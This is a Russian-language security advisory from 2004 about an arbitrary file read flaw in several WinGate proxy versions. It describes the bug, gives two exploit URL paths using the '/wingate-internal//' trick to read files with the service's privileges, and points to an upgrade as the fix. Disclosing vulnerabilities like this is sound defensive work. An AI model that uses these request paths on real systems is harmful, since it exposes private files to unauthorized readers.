Просмотр произвольных файлов в Wingate прокси

Дата публикации:
03.07.2004
Всего просмотров:
1038
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: WinGate 5.0.5, 5.2.3 build 901, 6.0 beta 2 build 942

Описание: Уязвимость в Wingate позволяет удаленному пользователю просматривать произвольные файлы на целевой системе.

Удаленный пользователь может подключится к Web прокси и представить специально обработнный запрос, чтобы просматривать файлы с привилегиями WinGate службы.

Эксплоит:

http://wingate5.example.com/wingate-internal//path
http://wingate6.example.com/wingate-internal///path 

Решение: http://www.wingate.com/product-wingate.php

Решение: Установите последнюю версию программы: http://www.wingate.com/download.php

Ссылки: iDEFENSE Security Advisory 07.01.04: WinGate Information Disclosure

или введите имя

CAPTCHA